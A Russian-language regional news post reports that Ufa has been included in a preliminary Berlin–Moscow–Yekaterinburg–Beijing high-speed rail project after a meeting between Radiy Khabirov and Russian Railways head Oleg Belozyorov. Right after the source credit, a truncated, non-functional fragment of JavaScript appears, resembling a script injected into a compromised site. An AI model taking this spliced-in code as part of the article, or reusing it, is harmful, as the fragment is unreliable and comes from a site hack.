Видео

Уфа вошла в предварительный проект скоростной железнодорожной магистрали Берлин-Москва-Е

Уфа вошла в предварительный проект скоростной железнодорожной магистрали Берлин-Москва-Е

Врио Главы Республики Башкортостан Радий Хабиров встретился с с председателем правления ОАО «РЖД» Олегом Белозёровым. На встрече был обсужден вопрос перспектив развития региона. После встречи руководитель региона выложил у себя в социальных сетях пост о возможности создания Единой высокоскоростной Евразийской сети. Таким образом, Уфа вошла в предварительный проект Берлин – Москва – Екатеринбург – Пекин.

Врио Главы Республики Башкортостан Радий Хабиров встретился с с председателем правления ОАО «РЖД» Олегом Белозёровым.

На встрече был обсужден вопрос перспектив развития региона. После встречи руководитель региона выложил у себя в социальных сетях пост о возможности создания Единой высокоскоростной Евразийской сети. Таким образом, Уфа вошла в предварительный проект Берлин – Москва – Екатеринбург – Пекин. Данный проект планируется завершить к 2030 году и для Башкирии это является историческим моментом. Также в социальной сети «ВКонтакте» Радий Хабиров опубликовал фотографию будущего проекта. Скоростная магистраль позволит поездам проезжать путь от Китая до Европы за 2-3 дня. А от Уфы до Москвы скоростной поезд будет ехать всего несколько часов. Окончательное решение о включении Уфы в проект в настоящее время еще не принято, но в ближайшем будущем планируется это сделать.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

Posts Carousel

Leave a Comment

Your email address will not be published. Required fields are marked with *

Latest Posts

Top Authors

Most Commented

Featured Videos